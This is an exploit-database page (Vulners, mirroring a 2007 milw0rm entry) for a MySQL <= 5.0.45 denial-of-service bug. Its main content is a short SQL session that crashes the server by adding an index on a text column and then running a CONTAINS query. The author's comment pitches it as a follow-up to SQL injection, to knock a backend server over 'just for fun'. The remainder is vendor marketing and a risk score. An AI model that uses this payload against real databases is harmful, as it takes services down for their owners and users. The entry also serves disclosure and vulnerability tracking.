Vulners
Lucene search
MySQL <= 5.0.45 (Alter) Denial of Service Vulnerability
/*
* MySQL <=6.0 possibly affected
* Kristian Erik Hermansen
* Credit: Joe Gallo
* You must have ALTER permissions to exploit this bug!
* Scenario: You found SQL injection, but you want to punch backend server
* in the nuts just for fun. Start with the ALTER TABLE statement on
* a table and field you know to exist. The first two SQL statements are
* simply to demostrate reproducibility...
*/
<snip>
mysql> CREATE TABLE `test` (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT PRIMARY KEY,
`foo` text NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
Query OK, 0 rows affected
mysql> SELECT * FROM test WHERE CONTAINS(foo, 'bar');
Empty set
mysql> ALTER TABLE test ADD INDEX (foo(100));
Query OK, 0 rows affected
Records: 0 Duplicates: 0 Warnings: 0
mysql> SELECT * FROM test WHERE CONTAINS(foo, 'bar');
ERROR 2013 : Lost connection to MySQL server during query
</snip>
# milw0rm.com [2007-11-09]
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1